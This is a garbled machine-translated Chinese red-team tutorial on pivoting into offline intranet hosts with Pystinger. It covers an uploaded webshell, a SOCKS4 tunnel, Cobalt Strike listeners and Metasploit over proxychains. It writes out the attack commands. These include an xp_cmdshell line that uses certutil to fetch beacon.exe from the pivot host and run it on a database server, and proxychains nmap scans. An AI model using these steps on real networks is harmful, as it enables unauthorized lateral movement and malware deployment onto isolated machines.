（ Venomous sting ） utilize Pystinger Socks4 Online and offline hosts

Link to the original text ：https://mp.weixin.qq.com/s/cpN91KpBvTHwqqFHAQZDOw

We will continue to share an article on the use of Pystinger Socks4 The posture of online and offline hosts in proxy mode , Including two common scenarios of single host and multiple hosts in the intranet ！！！

Project address ：https://github.com/FunnyWolf/pystinger

** Related reading ：

**

1、 utilize MSF Sharing ideas of online and offline hosts

2、 utilize goproxy http Online and offline hosts

0x01 Test environment

 attack （Kali）：192.168.56.101 The victim 1（Web）：192.168.56.102、192.168.186.3 -  Double network card victim 2（Data）：192.168.186.4 -  Network breaker 

0x02 Pystinger Brief introduction

Pystinger By the server webshell、stinger_server And the client stinger_client Two parts , It can be done by webshell Implement intranet SOCK4 Proxy and port mapping , Support php/jsp(x)/aspx Three proxy scripts .

webshell Only responsible for traffic forwarding , Most of the work of establishing connections and processing data is done by stinger_server complete ,stinger_client It is used to receive the traffic data forwarded and connect with CS/MSF Of listener establish TCP Connections etc. .

The general principle is as follows , A more detailed principle analysis can be read “ Qianxin security service ” In the official account “ Practice of attack and defense of red team ： A new idea of building an intranet tunnel without leaving the network host ” One article to learn .

0x03 Pystinger Online and offline hosts

We will first Pystinger The server side of the project stinger_server.exe、proxy.aspx Upload the Chinese kitchen knife to the readable and writable directory of the target disk , visit proxy.aspx return UTF-8 Is normal , Then execute the following command to start the server .

start C:\inetpub\wwwroot\stinger_server.exe 0.0.0.0

** notes ：** The author suggests not to run directly D:/XXX/stinger_server.exe, Because it could lead to TCP Disconnection .

The client stinger_client Uploaded to the Kali The attacker tmp Temporary directory , Then execute the following command to Socks4 The proxy traffic is forwarded to us Kali attack 60000 On port , Just put -w Replace the parameter with the proxy script address uploaded by yourself .

[email protected]:/tmp# chmod 777 [email protected]:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000

scene 1： Single host online

The controlled host is a single host , Not out of the Internet and only allowed to access the target Web Of 80 port . In case of such a scenario, you can perform the above operations in CobaltStrike Create a Listener,HTTP Hosts fill 127.0.0.1,HTTP Port fill 60020.

scene 2： Multi host Online

The controlled host is one of the hosts in the intranet , The double card （192.168.56.X For outgoing segment ,192.168.186.X For not leaving the network segment ）, When other intranet hosts in the non outgoing network segment are horizontally moved online, you can go online after performing the above operations CobaltStrike Create a Listener,HTTP Hosts fill 192.168.186.3,HTTP Port fill 60020.

After monitoring is configured, an executable horse is generated , Put the file in 192.168.186.3 Of Web Server for 192.168.186.4 Offline database server download , recycling xp_cmdshell Component execution beacon.exe Then you can successfully go online ,Pystinger The client also received relevant connection data .

EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:\ProgramData\beacon.exe'EXEC master..xp_cmdshell 'C:\ProgramData\beacon.exe'

CobaltStrike Monitor settings

• Single host online ：CobaltStrike->Listeners->Add->127.0.0.1:60020;

• Multi host Online ：CobaltStrike->Listeners->Add->192.168.186.3:60020;

• ** notes ：** When the target host is a dual network card, it must not be out of the network IP Intranet of segment IP Only by monitoring the address can the online and offline hosts ;

Go online to MSF Use posture

Kali Attack on-board editor /etc/proxychains.conf file , Add a bar at the bottom socks4 agent ：127.0.0.1:60000, After adding, first execute the following commands to verify whether it has been connected to the network IP Duan Tong ？

[email protected]:~# proxychains telnet 192.168.186.4 [email protected]:~# proxychains curl http://[email protected]:~# proxychains nmap -sT -Pn 192.168.186.4[...SNIP...]

If it passes, use it again proxychains To start up msfconsole, Can't use the Internet IP Intranet of segment IP Listen to the address . We all know the principle , It's not practical to take screenshots ….

[email protected]:~# proxychains msfconsole -q[...SNIP...]